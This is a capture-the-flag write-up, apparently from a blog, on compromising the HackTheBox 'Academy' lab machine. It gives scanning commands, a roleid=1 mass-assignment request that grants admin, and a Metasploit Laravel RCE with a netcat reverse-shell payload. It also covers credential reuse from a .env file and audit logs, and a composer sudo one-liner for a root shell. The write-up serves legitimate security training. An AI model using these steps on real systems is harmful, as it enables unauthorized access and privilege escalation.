Academy HackTheBox WalkThrough

This is Academy HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Academy HackTheBox machine. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.215 and difficulty easy assigned by its maker.

First of all connect your PC with HackTheBox VPN and make sure your connectivity with Academy machine by pinging its IP 10.10.10.215. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap for scanning and the result is given below:-

Scanning

$nmap -sC -sV -oN academy.nmap 10.10.10.215

Nmap revealed port 22 and port 80 are open. OpenSSH on port 22 and Apache2 web server on port 80 are running. Further nmap script http-title shows redirects to domain academy.htb. Added this domain pointing to IP 10.10.10.215 to my hosts file located at directory /etc/ so that if virtual host routing is enabled on this IP we would get other websites too.

Host File after Modification

$cat /etc/hosts

After going to http://academy.htb found register and login pages at URL http://academy.htb/register.php and http://academy.htb/login.php respectively. Soon I get any register page during any CTF challenge then immediately I register with some fake credentials because as a registered user we may have more options to play with. Like, if the web application allows us to upload our avatar then we can test for uploading php shell there and even we can also test for various injection attacks. So this time too I tried to do the same but unfortunately I was not allowed to do anything which I have talked about.

Checked page-source for some clues in comment section but nothing interesting found in it. Then nothing left except for directory and file bruteforcing. So performed directory bruteforcing with $dirsearch (a well-known directory bruteforcing tool written in python) with its default wordlist.

Directory Bruteforcing

$ sudo dirsearch -u http://academy.htb -t 50 -e all

Directory bruteforcing revealed many files which also includes admin.php. After going to this page located at URL http://academy.htb/admin.php found admin login page. Tried to login with some default credentials like admin: admin & admin: password but nothing worked. After spending sometimes on this site and playing with Burpsuite found a way by which we can register and login to admin account.

To register yourself as an admin user you have to first capture the request of register.php page into Burpsuite and then simply change the value of parameter roleid to 1 from 0 and change the value of other parameters uid, password & confirm to something other than what you have used to register as normal user and forward the request. Turn off the intercept. The POST data of request will look like.

uid=anything1&password=anything1&confirm=anything1&roleid=1

After forwarding the request your account will be registered as admin account. Now login with the credential at URL http://academy.htb/admin.php. In my case the admin account credential is anything1: anything1. After login as admin got Academy Launch Planner admin page which contains a subdomain dev-staging-01.academy.htb and nothing interesting found on this page. Added this subdomain to my hosts file located at directory /etc/.

Host File After Modification

$ cat /etc/hosts

After going to the URL http://dev-staging-01.academy.htb found a lot of details about the website and webservers. It also reveals APP_NAME which is Laravel.

Soon I got information about Laravel I immediately googled for laravel exploits and luckily found a metasploit module for PHP Laravel Framework token Unserialize Remote Command Execution. For more information about this vulnerability check this exploit-db link.

The metasploit module is unix/http/laravel_token_unserialize_exec. This module has additional option of APP_KEY which is present below APP_ENV at http://dev-staging-01.academy.htb. When I tried to exploit using this module I could get user shell very easily. To get user shell I followed the given steps.

Getting User Shell

msf6 > search laravel

msf6 > use unix/http/laravel_token_unserialize_exec

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RHOSTS 10.10.10.215

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set PAYLOAD cmd/unix/reverse_netcat

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set LHOST 10.10.14.70

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit

~whoami && id

We have got user shell as user www-data. Let’s upgrade the shell to fully qualified Linux shell so that we can run more advanced Linux command over it.

Upgrading Shell

~python3 -c 'import pty;pty.spawn("/bin/sh")'

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

After some initial enumeration I found some credentials inside the hidden file env at directory /var/www/html/academy/. This file contains credential of database academy.

The extracted database username and password is dev : mySup3rP4s5w0rd!!. Tried to login with this credential using SSH but user dev does not exist in /home/ directory so it gave login failed. Wait we have 4 other users in home folder so tried to SSH with them one by one using this password and finally logged in as cry0l1t3. So here our credential for SSH is cry0l1t3: mySup3rP4s5w0rd!!. You can also switch to user cry0l1t3 within the current shell using $su command.

Getting Shell As User cry0l1t3

$ ssh [email protected]

~mySup3rP4s5w0rd!!

$ whoami

We are not in proper Linux shell so let us upgrade it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

user.txt file is accessible to cry0l1t3 so let us capture the flag.

Capture User Flag

$cat user.txt

Privilege escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. For this I ran linpeas.sh (a post exploitation enumeration script) on Academy machine. Linpeas finds information of all the potential vectors that can be used to escalate privilege to root.

Finding PrivEsc Vector

Linpeas found log files inside the directory /var/log/ are readable by user cry0l1t3. Let’s see whether we can find some interesting in these files. Log file contains login details of all the users inside the machine. If it is accessible by normal user, he can see all other users login activity including admin users. But wait there are a lot of files how to extract information from them.

So what I did was I just ignored all the files with extension .gz and focused on all other files ending with .log, .log.1, .log.2 and .log.3. After spending sometimes and searching for important information into these files I found some hex encoded data into file audit.log.3. Although there are many data available but for us some data are useful. The data can be extracted using $grep command.

$ grep -i data *

The data that was useful is

7375206D7262336E0A : su mrb3n

6D7262336E5F41634064336D79210A : mrb3n_Ac@d3my!

So we have credential of user mr3bn which is mrb3n : mrb3n_Ac@d3my! . Tried to switch user to mrb3n and successfully switched.

$su mrb3n

~mrb3n_Ac@d3my!

After switching to user mrb3n first command I ran was $sudo -l to see if any special permission is given to user mrb3n.

$sudo -l

$sudo -l revealed that user mrb3n can run all the command using composer binary. If you get such type of output like user can run (ALL : ALL) /usr/bin/composer then best place to get your exploit is GTFObin (Remember this). After going to https://gtfobins.github.io/gtfobins/composer/ you can find the exploit to escalate privilege. Here is the exploit snippet.

I followed the same step as given on GTFObin and could easily got root shell just by running a command. So here our PrivEsc Vector is Privilege Escalation by Sudo Right Exploitation.

Getting Root Shell

To upgrade user shell to root shell I just copied and pasted the whole below code in one step and after pressing enter I was root.

TF=$(mktemp -d)echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.jsonsudo composer --working-dir=$TF run-script x

You can confirm yourself as root by running $whoami and $id command.

# whoami && id

We have successfully got root shell. Let’s capture root flag.

Capture Root Flag

#cat /root/root.txt

This was how I rooted to the Academy HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out our latest walkthroughs at https://ethicalhacs.com/ .